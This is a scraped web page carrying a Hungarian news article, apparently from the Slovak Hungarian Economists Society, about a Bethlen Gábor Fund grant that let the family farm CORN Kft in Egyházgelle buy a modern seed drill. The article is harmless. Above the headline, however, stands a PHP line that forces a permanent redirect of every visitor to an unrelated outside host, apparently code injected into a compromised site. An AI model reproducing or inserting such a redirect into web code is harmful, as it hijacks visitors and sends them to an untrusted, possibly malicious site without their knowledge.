header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Csallóköz szívében gazdálkodó CORN Kft-t támogatta a Bethlen Gábor Alap
szombat, május 25, 2019

Keresés

Csallóköz szívében gazdálkodó CORN Kft-t támogatta a Bethlen Gábor Alap

2635-1A felvidéki magyarság életében a mezőgazdaság meghatározó gazdasági ágazat, s ez többszörösen érvényes Csallóközben, a felvidéki magyarság legerősebb bástyájában. Éppen ezért kiemelten fontos az itteni magyar agrárvállalkozások versenyképességeinek a támogatása, ugyanis a termőföld sok ezer magyar család számára biztosítja a megélhetést, a szülőföldön maradást.


A CORN Kft közel negyed évszázada működő többgenerációs magyar családi agrárvállalkozás, mely a csallóközi magyarság vidéki falvai közül az egyik legnagyobb községében, Egyházgellén gazdálkodik. A vállalkozás 2017-ben a külhoni magyar családi vállalkozások éve program keretében sikeresen pályázott a Bethlen Gábor Alapnál arra a pályázati felhívásra, amely a „Magyarországgal szomszédos országokban nyilvántartott és működő magyar családi vállalkozások tevékenységét támogatta".
Magyar családi vállalkozás egyik ügyvezetője, Kmotrík Ilona elmondta, hogy a Bethlen Gábor Alapnál elnyert pályázatnak köszönhetően sikerült egy olyan modern vetőgépet megvásárolniuk, amely minőségben javítja a sűrűn vetett gabonafélék és olajosok vetését.
A Bethlen Gábor Alap 4 500 000 forint támogatással járult hozzá egy Pneusej MsH 400 típusú vetőgép megvásárlásához, ami biztosítja a sűrűn vetett növényeknek a pontosabb kijuttatását a talajba, ezáltal csökkenti vetőmag szükségletét, míg a pontos és egyenletes egyedszám pedig nagyobb hozamot eredményez. A jövőben egy hektárra vetítve a cég így részben költség megtakarítást, részben magasabb árbevételt érhet el, ami növeli az agráriumban tevékenykedő magyar családi vállalkozás versenyképességét.
Kmotrík Ilona hozzátette, hogy a Bethlen Gábor Alap által nyújtott támogatásnak köszönhetően a jövőben bővíteni is tudják a termesztett kultúrák szerkezetét is, ami jelenleg főleg gabonafélékből (búza, árpa, kukorica) és olajosokból áll (repce, napraforgó), és az elmúlt években kezdtek el gyógyszeripari célokra máktermesztéssel foglalkoztni.
A Bethlen Gábor Alap által támogatott eszközbeszerzés a felvidéki családi gazdaságok körében hozzájárult a felvidéki magyarság gazdasági talpra állításához. Fennáll a veszély, ha a magyar gazda elöregedett és nem versenyképes technológiával fogja végezni az agrártermelést, akkor bizony előbb-utóbb csődbe jut, s azután előbb a területek megművelése, majd később akár azok tulajdonjoga is idegen, és nem magyar kezekbe kerülhet. Csallóközben már rengeteg termőföld dán, holland és szlovák tulajdonban van, ill. megművelés alatt áll. 2018-tól az egyházgellei határban az azt felügyelő és román stílusban épült kéttornyú római katolikus templom árnyékában lényegesen javultak a vetési feltételek a Bethlen Gábor Alapnak köszönhetően.

2635-2

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia